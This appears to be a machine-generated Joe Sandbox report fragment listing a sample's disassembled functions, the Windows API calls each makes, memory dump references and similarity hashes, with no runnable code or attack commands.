                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 28cb08c610c005357cf19fbc5d53f10f3a5bf881d01b0576672e1ecc6ab6cd4f
                                                                                                                                                                                                                                                                                                    • Instruction ID: da8c68781f651d3f7b28a29cfef61c7c08777deef82da866aa3bb7eda1d5d6ad
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28cb08c610c005357cf19fbc5d53f10f3a5bf881d01b0576672e1ecc6ab6cd4f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94215E75D00218AADF21DFA4DC84AEEBBB8EF46724F144216FA25EB1C0D7709986CF50
                                                                                                                                                                                                                                                                                                    Function 00A9138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00A913AE
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00A913C5
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A91401
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00A9140D
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00A91445
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d77217936fba15fc1afe43dcbf52c92ab176c7d13cdecec42745b40cbc6fe7e1
                                                                                                                                                                                                                                                                                                    • Instruction ID: a9da8fd33c6b56f881befc06db11686bb523cded9304bbf2cf379bf49e49ce3c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d77217936fba15fc1afe43dcbf52c92ab176c7d13cdecec42745b40cbc6fe7e1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A221A276600215AFDB04EFA5CD84AAEBBF5EF49300B048439F89AD7791DB30AD41DB90
                                                                                                                                                                                                                                                                                                    Function 00A4D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00A4D146
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A4D169
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A36A79,?,0000015D,?,?,?,?,00A385B0,000000FF,00000000,?,?), ref: 00A43BC5
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A4D18F
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4D1A2
                                                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A4D1B1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: abe9326fd089b530e52aeccc5edd37bdeba3873708cf4307c8fe0106f43c7e4e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5768248ee738ae9a90b7f14a01d3fd8c2944ac76c224ccd96b8011f83edaa9ef
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abe9326fd089b530e52aeccc5edd37bdeba3873708cf4307c8fe0106f43c7e4e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B901847A6016157F372167BE5C8CD7B6A6DDEC7B61314022AFD05CA244DBA08D0281B0
                                                                                                                                                                                                                                                                                                    Function 00A76078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2c6ed1c7a2b5e9a198f612d42f871b1cbf6c1fb021e967a98084fb16f488e95a
                                                                                                                                                                                                                                                                                                    • Instruction ID: ae4297001daf7fe20c4f194053f61f9c4e30cba954a19472e2962aa5ea9871b4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c6ed1c7a2b5e9a198f612d42f871b1cbf6c1fb021e967a98084fb16f488e95a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701D4F2600B057BD714AB209D82FEBB36DAE51399F08C421FD0E9B242E761ED11C6A1
                                                                                                                                                                                                                                                                                                    Function 00A4316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(0000000A,?,?,00A3F64E,00A3545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A43170
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A431A5
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A431CC
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A431D9
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A431E2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b4b994d19b059a56380697623fb17cb1877aa703cf4ab26974f49f076a42dc5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0d23f489c2655e6cd58bd1b360b5318a470427ffc6353018ccc9e6367e05e210
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b4b994d19b059a56380697623fb17cb1877aa703cf4ab26974f49f076a42dc5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401287F6416017B9E12B77C9D86E2B266DEFC13717200629F826D21C1EF71CA024221
                                                                                                                                                                                                                                                                                                    Function 00A708FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?,?,00A70C4E), ref: 00A7091B
                                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70936
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70944
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?), ref: 00A70954
                                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70960
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e3d5c9368694cfe8d3a864e72562e17724ca5a5b4f3e8158e6022f1aea3c436e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c36748c1e1ed0ead360e2c1b9b78128aa311c243e2dbad89618a9682e75dd24
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3d5c9368694cfe8d3a864e72562e17724ca5a5b4f3e8158e6022f1aea3c436e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F901DFB2600205EFEB008FA8CC04F9A7ABDEB48751F108024FA4AE2251D770CD019BA0
                                                                                                                                                                                                                                                                                                    Function 00A7F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00A7F2AE
                                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00A7F2BC
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00A7F2C4
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00A7F2CE
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00A7F30A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 128536cb2837ef66eb372747d1f4a7c8eab34218760a59985f8a56d0282319c9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 18104f8434322d749454d71e2d92045d95a18f2bbbbef5c0ec99b47aebd85b5e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 128536cb2837ef66eb372747d1f4a7c8eab34218760a59985f8a56d0282319c9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1701A931C0061ADFCF00EFE4EC48AEEBB79FB09300F008026E956B2280CB309655CBA1
                                                                                                                                                                                                                                                                                                    Function 00A71A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A71A60
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A6C
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A7B
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A82
                                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A71A99
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 92e79e2bb87fbbf18eb70251e186df4b168a4b61ee9925c547f1baa1adadc5d9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3aa7f939e2772319863b1d5eee0336e08c8a286313387885e17c98808d4cea31
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92e79e2bb87fbbf18eb70251e186df4b168a4b61ee9925c547f1baa1adadc5d9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6801A4B5601306BFDB118FA8DC48D6B3BBDEF893A4B214414F886C72A0DB31DC41CA60
                                                                                                                                                                                                                                                                                                    Function 00A71900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A71916
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A71922
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A71931
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A71938
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7194E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 16aea4b1a2c713fd97a29261450cd0ff7129eb36e07336b5a2a12771a0e04350
                                                                                                                                                                                                                                                                                                    • Instruction ID: e40966b56ef6d80abca6d3ab7d3eb4b243640396a298af3ab35fbfa829c19323
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16aea4b1a2c713fd97a29261450cd0ff7129eb36e07336b5a2a12771a0e04350
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4F06875100302ABDB114FA9DC4DF563BADEF86750F104424FA46D72D0DB70DC028A60
                                                                                                                                                                                                                                                                                                    Function 00A71960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A71976
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A71982
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A71991
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A71998
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A719AE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 55cf17a2f01f0576dc62bdd9f7684f92ba4d4033f6bf822a53217db4aef4d1d2
                                                                                                                                                                                                                                                                                                    • Instruction ID: f3ad5f74e2e5f59bb8dc1737dd164fb38b3a2a012179ff2b2b08d36f164dfa27
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55cf17a2f01f0576dc62bdd9f7684f92ba4d4033f6bf822a53217db4aef4d1d2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F06875100302ABD7214FA8DC59F563BADEF8A750F104514FA46C7290DB70D8028A60
                                                                                                                                                                                                                                                                                                    Function 00A80CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CCB
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CD8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CE5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CF2
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CFF
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80D0C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 46bc7f4338943f5c6c9630507e5eba274e496238f9769ae3b5a602612024dd88
                                                                                                                                                                                                                                                                                                    • Instruction ID: 28d59af650b0daba0cc886aebef8c11f9ee05e3f5f875ac1f7076201880d94dc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46bc7f4338943f5c6c9630507e5eba274e496238f9769ae3b5a602612024dd88
